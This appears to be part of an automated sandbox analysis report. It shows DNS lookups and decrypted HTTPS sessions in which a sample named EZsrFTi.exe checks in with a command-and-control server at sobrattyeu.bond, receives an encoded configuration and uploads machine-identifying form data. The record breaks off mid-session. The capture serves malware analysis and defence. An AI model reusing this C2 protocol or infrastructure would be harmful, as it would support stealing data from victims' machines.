Jan 15, 2025 18:11:04.951430082 CET	1.1.1.1	192.168.2.11	0x7eb6	No error (0)	sobrattyeu.bond	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 15, 2025 18:11:04.951430082 CET	1.1.1.1	192.168.2.11	0x7eb6	No error (0)	sobrattyeu.bond	104.21.32.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sobrattyeu.bond

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49707	104.21.64.1	443	7732	C:\Users\user\Desktop\EZsrFTi.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 17:11:05 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sobrattyeu.bond
2025-01-15 17:11:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-15 17:11:05 UTC	1121	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 17:11:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pqslr3rk4uk83odiidgvnu3c9p; expires=Sun, 11 May 2025 10:57:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MS5pqPKws0B%2B8mUplQUwYhmxM5KFINhhunMUtf1JMMP8Z9kuwKmNyTex1vW9zApVhZIFBqMpcb%2FBHzW4xIKEjRZ3uX9lBnGuFI055SVFnDKbkhjhW0H9rhNZN8BYMKh46Oo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90277ba3ca774414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1728&rtt_var=668&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1689814&cwnd=180&unsent_bytes=0&cid=ad9859871ebe12ea&ts=514&x=0"
2025-01-15 17:11:05 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-15 17:11:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49708	104.21.64.1	443	7732	C:\Users\user\Desktop\EZsrFTi.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 17:11:06 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: sobrattyeu.bond
2025-01-15 17:11:06 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 37 33 32 39 39 31 30 36 39 30 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--7329910690&j=
2025-01-15 17:11:07 UTC	1131	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 17:11:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=601pku1014g566l6nd6fppmulf; expires=Sun, 11 May 2025 10:57:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vIE7vJa3W8utJJm5%2FEzrvK%2BWe6kUtZz%2F7P%2FvxMVcsUKy6Df%2B4kKTi5GoUV2hni9%2Fgi%2BcEW9YlxXEnOlwuiDpjtAwaLIyLxx8Kh8QijzEwOXCfppYddkBuTf3exlizoGoxbs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90277bab9bbd4414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1704&rtt_var=650&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=951&delivery_rate=1670480&cwnd=180&unsent_bytes=0&cid=0cc14688a5659e50&ts=982&x=0"
2025-01-15 17:11:07 UTC	238	IN	Data Raw: 34 39 39 34 0d 0a 33 67 68 78 2f 6b 57 31 33 67 76 77 47 44 77 55 53 79 6b 46 66 65 7a 6a 4e 41 39 6f 58 7a 73 77 6c 74 48 72 54 42 2b 42 72 33 4b 6c 4b 67 66 63 66 34 48 79 4b 59 4e 39 48 69 34 2f 57 33 41 59 77 4d 46 56 61 30 70 6c 58 56 48 36 6f 6f 35 67 50 66 66 43 55 4f 52 75 45 4a 49 32 30 50 49 70 6c 57 41 65 4c 68 42 53 4a 78 69 43 77 51 34 74 44 54 56 5a 55 66 71 7a 69 69 64 77 38 63 4d 52 74 6d 51 57 6c 69 44 57 75 6d 71 63 64 56 6c 78 4c 6b 68 76 45 34 57 4f 58 47 4a 4b 63 78 6c 56 37 50 50 52 62 6c 4c 6b 32 78 4f 54 61 51 4b 56 5a 38 6a 79 63 4e 4a 39 55 6a 5a 78 43 32 51 59 6a 6f 39 53 61 77 4d 33 55 31 6a 79 73 6f 38 6d 62 2b 6a 4a 47 72 5a 71 46 5a 63 71 33 36 35 6e 6c 6e 4a 53 64 79 52 49 Data Ascii: 49943ghx/kW13gvwGDwUSykFfezjNA9oXzswltHrTB+Br3KlKgfcf4HyKYN9Hi4/W3AYwMFVa0plXVH6oo5gPffCUORuEJI20PIplWAeLhBSJxiCwQ4tDTVZUfqziidw8cMRtmQWliDWumqcdVlxLkhvE4WOXGJKcxlV7PPRblLk2xOTaQKVZ8jycNJ9UjZxC2QYjo9SawM3U1jyso8mb+jJGrZqFZcq365nlnJSdyRI
2025-01-15 17:11:07 UTC	1369	IN	Data Raw: 4a 31 48 4f 68 6b 34 74 55 6e 30 4b 59 50 65 69 6d 44 74 77 38 38 74 51 6f 79 51 4b 33 43 44 62 2f 44 48 53 63 6c 4a 34 4c 45 68 6f 47 49 2b 42 52 47 49 4b 50 6c 46 61 38 4c 6d 47 49 58 4c 74 78 78 65 30 59 78 53 54 49 4e 2b 36 5a 70 45 36 45 44 59 75 55 79 64 48 7a 71 46 47 62 67 6b 70 56 45 4f 30 72 4d 63 33 50 65 54 42 55 4f 51 71 46 5a 49 6d 32 72 78 37 6d 6e 46 56 63 7a 74 41 62 68 4b 44 67 56 74 6e 42 54 35 5a 56 66 36 35 68 69 52 35 37 73 41 57 76 47 70 54 30 6d 66 51 70 43 6e 4b 4f 6e 31 7a 4f 55 78 72 43 63 79 37 46 6e 4a 45 4a 42 6c 56 2b 50 50 52 62 6e 58 6d 7a 68 4f 33 5a 52 43 55 4c 4d 57 38 65 35 52 33 57 32 51 76 54 6d 6b 56 6a 5a 4e 63 59 77 77 2b 55 46 6e 39 74 6f 34 71 50 61 32 4e 46 36 51 71 53 39 77 47 32 72 64 6c 6d 47 31 65 4e 6a 59 Data Ascii: J1HOhk4tUn0KYPeimDtw88tQoyQK3CDb/DHSclJ4LEhoGI+BRGIKPlFa8LmGIXLtxxe0YxSTIN+6ZpE6EDYuUydHzqFGbgkpVEO0rMc3PeTBUOQqFZIm2rx7mnFVcztAbhKDgVtnBT5ZVf65hiR57sAWvGpT0mfQpCnKOn1zOUxrCcy7FnJEJBlV+PPRbnXmzhO3ZRCULMW8e5R3W2QvTmkVjZNcYww+UFn9to4qPa2NF6QqS9wG2rdlmG1eNjY
2025-01-15 17:11:07 UTC	1369	IN	Data Raw: 70 4e 61 5a 77 77 79 56 46 36 30 2f 63 6b 70 5a 61 4f 56 55 4a 5a 70 42 35 38 74 6c 59 6c 71 6e 48 52 5a 59 47 6c 55 4b 51 62 4f 68 6c 6f 74 55 6e 31 55 55 2f 79 31 6d 79 46 77 34 4d 4d 65 73 32 38 63 6c 43 66 58 73 57 79 57 63 56 56 31 4a 45 39 31 46 59 36 4a 55 32 77 41 4e 78 6b 63 74 4c 53 52 62 69 57 6a 2f 41 65 33 4b 43 61 66 4b 64 6d 37 66 39 4a 6c 45 47 39 70 54 47 74 66 31 73 46 62 5a 51 38 34 56 6c 50 2b 76 59 77 6b 63 65 76 44 45 36 35 6c 46 35 77 72 33 37 5a 6b 6e 48 35 57 66 79 4a 41 59 52 2b 50 69 78 59 6a 53 6a 70 42 45 71 7a 7a 76 53 6c 78 37 73 4a 53 69 57 6b 64 6b 69 44 42 2f 48 62 63 59 78 35 78 4a 51 73 2f 58 34 4b 49 56 6d 59 41 4f 56 6c 56 2b 62 61 4b 4b 58 37 75 79 68 71 79 62 52 65 51 4c 74 71 36 61 5a 56 2b 57 32 51 73 51 6d 73 54 Data Ascii: pNaZwwyVF60/ckpZaOVUJZpB58tlYlqnHRZYGlUKQbOhlotUn1UU/y1myFw4MMes28clCfXsWyWcVV1JE91FY6JU2wANxkctLSRbiWj/Ae3KCafKdm7f9JlEG9pTGtf1sFbZQ84VlP+vYwkcevDE65lF5wr37ZknH5WfyJAYR+PixYjSjpBEqzzvSlx7sJSiWkdkiDB/HbcYx5xJQs/X4KIVmYAOVlV+baKKX7uyhqybReQLtq6aZV+W2QsQmsT
2025-01-15 17:11:07 UTC	1369	IN	Data Raw: 74 4b 49 68 64 4c 74 4c 53 46 62 69 57 6a 78 42 6d 75 5a 42 32 56 4b 74 47 30 62 70 78 33 56 58 41 69 54 47 41 5a 67 34 6c 62 61 41 6b 38 58 56 6a 6d 73 49 49 6b 63 4f 6d 4e 58 76 78 74 43 39 78 2f 6c 35 74 6c 75 32 70 46 5a 44 38 4c 65 46 47 58 77 56 46 68 53 6d 55 5a 55 66 75 36 68 69 5a 31 37 4d 49 55 73 6d 77 56 6b 53 4c 59 74 6e 75 61 64 46 4e 39 4a 6b 42 31 48 34 4f 46 57 6d 6b 43 4e 6c 4d 53 75 76 4f 4f 4e 6a 32 37 6a 53 57 78 5a 52 4f 66 4d 5a 65 6a 4a 34 73 36 57 58 70 70 45 79 63 54 67 49 46 5a 59 51 59 32 55 56 50 34 76 59 34 72 64 4f 76 46 41 72 31 75 47 35 30 70 32 4c 31 74 6c 33 39 61 63 53 31 4e 61 46 2f 41 77 56 46 31 53 6d 55 5a 66 64 4f 47 79 77 39 48 6f 39 4a 65 70 53 6f 55 6b 47 65 50 2f 47 57 52 64 6c 5a 35 4c 30 4a 72 46 59 65 4b 57 Data Ascii: tKIhdLtLSFbiWjxBmuZB2VKtG0bpx3VXAiTGAZg4lbaAk8XVjmsIIkcOmNXvxtC9x/l5tlu2pFZD8LeFGXwVFhSmUZUfu6hiZ17MIUsmwVkSLYtnuadFN9JkB1H4OFWmkCNlMSuvOONj27jSWxZROfMZejJ4s6WXppEycTgIFZYQY2UVP4vY4rdOvFAr1uG50p2L1tl39acS1NaF/AwVF1SmUZfdOGyw9Ho9JepSoUkGeP/GWRdlZ5L0JrFYeKW
2025-01-15 17:11:07 UTC	1369	IN	Data Raw: 61 56 76 47 38 69 43 39 37 38 63 6f 5a 72 6d 51 65 6b 79 2f 66 74 57 69 57 66 31 4e 77 4a 55 46 6d 47 49 43 50 58 69 31 45 66 56 35 4b 74 4f 76 4a 44 32 33 34 33 77 61 78 53 78 36 54 5a 38 6a 79 63 4e 4a 39 55 6a 5a 78 43 32 34 4e 69 6f 78 45 5a 41 30 7a 56 6c 48 6d 73 6f 51 6c 62 2b 54 43 46 4c 74 6d 46 5a 4d 68 31 72 6c 6a 6e 6e 31 62 66 53 5a 48 4a 31 48 4f 68 6b 34 74 55 6e 31 33 57 65 65 6b 69 69 42 32 39 64 5a 51 6f 79 51 4b 33 43 44 62 2f 44 48 53 65 56 56 39 4c 55 74 72 48 34 71 4d 56 6e 38 46 4f 6c 35 62 2f 36 47 44 4b 58 72 6f 78 52 75 7a 62 41 47 51 4b 63 57 35 65 34 41 36 45 44 59 75 55 79 64 48 7a 72 64 52 66 52 6f 2b 47 32 50 69 73 4a 38 6c 63 4f 2b 4e 44 2f 4a 7a 55 35 73 72 6c 2b 51 70 6c 48 56 58 64 53 5a 4b 62 68 4f 44 68 46 39 6f 43 7a Data Ascii: aVvG8iC978coZrmQeky/ftWiWf1NwJUFmGICPXi1EfV5KtOvJD2343waxSx6TZ8jycNJ9UjZxC24NioxEZA0zVlHmsoQlb+TCFLtmFZMh1rljnn1bfSZHJ1HOhk4tUn13WeekiiB29dZQoyQK3CDb/DHSeVV9LUtrH4qMVn8FOl5b/6GDKXroxRuzbAGQKcW5e4A6EDYuUydHzrdRfRo+G2PisJ8lcO+ND/JzU5srl+QplHVXdSZKbhODhF9oCz
2025-01-15 17:11:07 UTC	1369	IN	Data Raw: 67 59 6f 31 50 66 79 44 43 66 78 74 48 39 78 2f 6c 37 39 75 6b 58 74 55 66 79 56 45 59 42 75 63 69 31 46 2f 43 7a 78 53 58 2f 69 7a 68 43 4e 33 34 73 51 64 73 47 63 55 6d 79 6a 53 2f 43 66 53 66 55 59 32 63 51 74 47 45 6f 57 4e 44 54 64 4b 49 68 64 4c 74 4c 53 46 62 69 57 6a 7a 52 71 35 59 42 36 66 4b 4e 53 75 61 4a 52 6f 58 6e 73 6a 57 57 30 55 69 34 78 62 59 41 6b 37 58 31 6e 34 6f 59 41 75 66 75 69 4e 58 76 78 74 43 39 78 2f 6c 35 39 2b 68 48 42 5a 65 6a 39 41 5a 68 79 59 6a 45 59 74 52 48 31 49 56 65 58 7a 30 54 68 74 39 4d 6f 50 38 6e 4e 54 6d 79 75 58 35 43 6d 55 63 31 68 78 4c 30 56 31 47 6f 69 4f 57 57 51 44 4f 56 46 52 39 4c 65 4e 4b 58 6a 67 77 52 75 37 61 52 79 59 4c 74 6d 31 5a 74 49 30 48 6e 45 78 43 7a 39 66 72 35 70 56 59 51 64 39 52 68 7a Data Ascii: gYo1PfyDCfxtH9x/l79ukXtUfyVEYBuci1F/CzxSX/izhCN34sQdsGcUmyjS/CfSfUY2cQtGEoWNDTdKIhdLtLSFbiWjzRq5YB6fKNSuaJRoXnsjWW0Ui4xbYAk7X1n4oYAufuiNXvxtC9x/l59+hHBZej9AZhyYjEYtRH1IVeXz0Tht9MoP8nNTmyuX5CmUc1hxL0V1GoiOWWQDOVFR9LeNKXjgwRu7aRyYLtm1ZtI0HnExCz9fr5pVYQd9Rhz
2025-01-15 17:11:07 UTC	1369	IN	Data Raw: 44 33 6b 31 56 44 6b 4b 6a 4f 58 4d 64 4b 37 66 39 42 50 58 58 67 6e 54 48 46 66 6b 62 34 59 4c 51 55 6e 47 51 72 4e 71 73 6b 70 63 61 4f 56 55 4b 6c 74 45 35 73 39 77 62 74 6c 67 33 46 54 65 67 74 45 59 41 6d 4e 6a 6c 56 38 41 33 46 53 58 37 54 39 79 53 6c 6c 6f 35 56 51 6b 32 30 46 6e 77 6a 55 72 57 44 53 4e 42 35 78 50 77 73 2f 58 37 44 42 52 47 34 61 50 6c 5a 44 79 76 50 52 4e 30 4f 6a 78 67 61 37 65 68 43 4b 4c 4e 71 77 65 4b 77 36 42 69 4a 37 47 54 56 4e 33 4a 34 57 63 6a 56 7a 47 56 4f 30 36 37 41 33 50 66 57 4e 53 4f 34 6b 55 34 35 6e 6a 2f 77 75 6b 57 68 4d 63 43 70 64 5a 46 69 77 76 33 46 37 41 44 70 4a 56 65 4f 38 79 57 41 39 37 49 31 49 68 53 6f 61 6d 7a 7a 47 71 6d 53 43 66 52 35 4a 5a 77 74 2f 58 39 62 42 59 32 34 45 4d 31 35 45 35 66 36 75 Data Ascii: D3k1VDkKjOXMdK7f9BPXXgnTHFfkb4YLQUnGQrNqskpcaOVUKltE5s9wbtlg3FTegtEYAmNjlV8A3FSX7T9ySllo5VQk20FnwjUrWDSNB5xPws/X7DBRG4aPlZDyvPRN0Ojxga7ehCKLNqweKw6BiJ7GTVN3J4WcjVzGVO067A3PfWNSO4kU45nj/wukWhMcCpdZFiwv3F7ADpJVeO8yWA97I1IhSoamzzGqmSCfR5JZwt/X9bBY24EM15E5f6u
2025-01-15 17:11:07 UTC	1369	IN	Data Raw: 55 42 73 57 5a 54 30 6d 66 43 74 32 57 55 64 30 73 35 4f 46 31 6b 43 59 6e 4e 58 6e 77 48 4d 52 6c 74 75 76 4f 52 62 69 57 6a 2b 42 4f 79 5a 42 53 4b 4e 70 71 63 59 70 35 35 55 6e 63 75 43 79 6c 66 69 4d 45 4f 50 6b 52 39 58 55 4f 30 36 39 6c 38 4a 72 61 65 52 2b 77 34 44 4e 49 2b 6c 36 6f 70 79 69 67 51 4e 6a 73 4c 50 31 2f 4a 67 6b 52 2f 44 44 35 50 55 62 4f 4e 74 79 39 77 37 49 45 65 74 32 6f 55 6a 44 48 4d 38 47 47 52 59 45 52 49 46 32 42 72 47 59 6d 62 55 57 73 73 48 52 6b 63 74 4c 7a 4a 64 6b 53 6a 68 56 43 44 4a 46 4f 45 5a 34 2f 38 58 4a 46 30 55 48 45 2f 57 69 6f 33 72 62 74 73 4c 79 59 36 54 42 44 41 74 4a 6b 2f 64 75 37 42 55 50 49 71 46 64 78 2f 68 2f 49 70 6c 6d 73 65 4c 6e 6b 5a 50 45 72 64 31 67 59 2f 46 58 4e 41 45 75 4c 7a 30 58 77 7a 6f Data Ascii: UBsWZT0mfCt2WUd0s5OF1kCYnNXnwHMRltuvORbiWj+BOyZBSKNpqcYp55UncuCylfiMEOPkR9XUO069l8JraeR+w4DNI+l6opyigQNjsLP1/JgkR/DD5PUbONty9w7IEet2oUjDHM8GGRYERIF2BrGYmbUWssHRkctLzJdkSjhVCDJFOEZ4/8XJF0UHE/Wio3rbtsLyY6TBDAtJk/du7BUPIqFdx/h/IplmseLnkZPErd1gY/FXNAEuLz0Xwzo
2025-01-15 17:11:07 UTC	1369	IN	Data Raw: 71 42 64 78 2f 68 50 49 70 67 44 6f 47 4e 6d 35 46 61 68 36 4e 6a 31 56 2f 47 44 74 61 52 50 66 30 74 78 42 59 37 73 41 56 73 6d 30 74 6f 67 62 64 72 47 53 64 66 52 78 57 4c 6c 31 6b 49 62 43 32 52 32 6f 61 66 33 39 52 34 72 44 4a 59 44 33 37 6a 55 6a 38 53 78 6d 4d 4b 74 69 37 4b 37 4a 39 53 48 56 70 42 53 63 62 7a 74 6b 57 53 41 63 77 58 46 7a 7a 38 61 67 6b 62 65 37 43 46 2f 35 4b 46 49 6f 6b 6c 2f 49 70 6e 6a 6f 47 4e 69 68 42 64 78 4b 42 68 68 70 71 45 44 6f 5a 48 4c 53 39 79 58 59 39 34 73 63 41 73 57 55 55 30 43 48 5a 73 69 6d 4e 4e 45 63 32 50 77 73 2f 54 4d 44 42 52 43 31 53 66 52 35 52 35 71 47 50 4c 57 76 67 69 69 36 43 52 77 47 62 4e 39 54 2b 57 4a 39 2b 53 47 4d 71 57 32 41 68 73 4b 78 45 61 68 6f 2b 47 32 50 69 73 49 6b 67 65 71 4f 44 55 4b Data Ascii: qBdx/hPIpgDoGNm5Fah6Nj1V/GDtaRPf0txBY7sAVsm0togbdrGSdfRxWLl1kIbC2R2oaf39R4rDJYD37jUj8SxmMKti7K7J9SHVpBScbztkWSAcwXFzz8agkbe7CF/5KFIokl/IpnjoGNihBdxKBhhpqEDoZHLS9yXY94scAsWUU0CHZsimNNEc2Pws/TMDBRC1SfR5R5qGPLWvgii6CRwGbN9T+WJ9+SGMqW2AhsKxEaho+G2PisIkgeqODUK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49710	104.21.64.1	443	7732	C:\Users\user\Desktop\EZsrFTi.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 17:11:08 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BF6DZ3JBI07BD1HUH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12846 Host: sobrattyeu.bond
2025-01-15 17:11:08 UTC	12846	OUT	Data Raw: 2d 2d 42 46 36 44 5a 33 4a 42 49 30 37 42 44 31 48 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 41 44 36 30 30 30 35 33 36 31 44 32 38 36 30 35 32 32 44 35 45 38 37 45 33 43 43 33 39 34 0d 0a 2d 2d 42 46 36 44 5a 33 4a 42 49 30 37 42 44 31 48 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 46 36 44 5a 33 4a 42 49 30 37 42 44 31 48 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 33 32 39 39 31 30 36 Data Ascii: --BF6DZ3JBI07BD1HUHContent-Disposition: form-data; name="hwid"E2AD60005361D2860522D5E87E3CC394--BF6DZ3JBI07BD1HUHContent-Disposition: form-data; name="pid"2--BF6DZ3JBI07BD1HUHContent-Disposition: form-data; name="lid"yau6Na--73299106
2025-01-15 17:11:08 UTC	1124	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 17:11:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f2qpmh421n38p6d6tn675mi5s3; expires=Sun, 11 May 2025 10:57:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CqDvZ%2FJ2%2BLAISaEYp9K1MnPSJkryQ8eq6aIKiIzeHBHaUrop01Z1iYkwGUdPUbtN0l2UDqo6AERhaOb7EXyTERODlK1Y6QhOTZI79qBV8wxpjQx44AyNA6ccIuGXPxU7MWA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90277bb45b3342e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1689&rtt_var=665&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13784&delivery_rate=1607929&cwnd=241&unsent_bytes=0&cid=49df91ec57d0fd3f&ts=773&x=0"
2025-01-15 17:11:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-15 17:11:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49715	104.21.64.1	443	7732	C:\Users\user\Desktop\EZsrFTi.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 17:11:09 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4QHHLDZZVBYITK5MH8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15064 Host: sobrattyeu.bond
2025-01-15 17:11:09 UTC	15064	OUT	Data Raw: 2d 2d 34 51 48 48 4c 44 5a 5a 56 42 59 49 54 4b 35 4d 48 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 41 44 36 30 30 30 35 33 36 31 44 32 38 36 30 35 32 32 44 35 45 38 37 45 33 43 43 33 39 34 0d 0a 2d 2d 34 51 48 48 4c 44 5a 5a 56 42 59 49 54 4b 35 4d 48 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 51 48 48 4c 44 5a 5a 56 42 59 49 54 4b 35 4d 48 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 33 32 39 39 Data Ascii: --4QHHLDZZVBYITK5MH8Content-Disposition: form-data; name="hwid"E2AD60005361D2860522D5E87E3CC394--4QHHLDZZVBYITK5MH8Content-Disposition: form-data; name="pid"2--4QHHLDZZVBYITK5MH8Content-Disposition: form-data; name="lid"yau6Na--73299
2025-01-15 17:11:10 UTC	1123	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 17:11:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b4funlel842i3c7fqi4kkestgm; expires=Sun, 11 May 2025 10:57:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zIVIOVhXC7dMqcH9g65gH4o71ADHtkYbtpQrOBeLfCkcrS9FWcB5dbWY7Cw1bQVpRODB1uYIjN7rT8sApbRxiG%2BxCCUbxwAmeBNWzmzODT45vTbspgAWyu1V4ZuXcqNxdRw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90277bbd1c0b8ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1990&rtt_var=746&sent=13&recv=20&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16003&delivery_rate=1466599&cwnd=168&unsent_bytes=0&cid=0901805f80c9532d&ts=688&x=0"
2025-01-15 17:11:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-15 17:11:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49727	104.21.64.1	443	7732	C:\Users\user\Desktop\EZsrFTi.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 17:11:10 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=G7J5MQQ4QJR3QLITMQS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20439 Host: sobrattyeu.bond
2025-01-15 17:11:10 UTC	15331	OUT	Data Raw: 2d 2d 47 37 4a 35 4d 51 51 34 51 4a 52 33 51 4c 49 54 4d 51 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 41 44 36 30 30 30 35 33 36 31 44 32 38 36 30 35 32 32 44 35 45 38 37 45 33 43 43 33 39 34 0d 0a 2d 2d 47 37 4a 35 4d 51 51 34 51 4a 52 33 51 4c 49 54 4d 51 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 37 4a 35 4d 51 51 34 51 4a 52 33 51 4c 49 54 4d 51 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 33 Data Ascii: 